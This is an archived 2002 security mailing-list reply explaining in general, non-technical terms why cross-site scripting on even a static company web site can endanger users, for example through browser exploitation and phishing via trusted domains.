Hosting Provided By

RE: XSS

From: David Endler <dendler(at)idefense.com>
Date: Tue Dec 10 2002 - 13:40:08 EST

Hi John,

I guess what you're asking is if your company has a vulnerable static web site, should you really care? With regard to that web site's data, you're probably safe, unless you're sharing cookies/tokens across multiple domains (e.g. MS passport). I know I'm belaboring the point which has been made in other mailing list posts, but you can do a lot more with XSS beside cookie stealing/account hijacking.

XSS attacks can be used to assist in various types of browser exploitation (buffer/heap overflow, browser hijacking, etc.) which can lead to revealing sensitive information/files on the desktop or network file system, denial of service scripting against the user or others, or potentially any code the attacker can get the browser to launch with the privileges of that user.

How does this affect your web site data directly? It may not. But vulnerable users (and your clients) are much more likely to click on malicious web or email links with domains they know and trust (e.g. yahoo.com, cnn.com, yourcompany.com, etc.).

-dave

> -----Original Message-----
Received on Tue Dec 10 14:07:41 2002

This message: [ Message body ]
Next message: zeno: "Re: Apache module: mod_security"
Previous message: zeno: "Re: XSS"
Maybe in reply to: John Madden: "XSS"
In reply to Eyal Udassin: "RE: XSS"

Contemporary messages sorted: [ By Date ] [ By Thread ] [ By Subject ] [ By Author ] [ By messages with attachments ]

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:07:46 EDT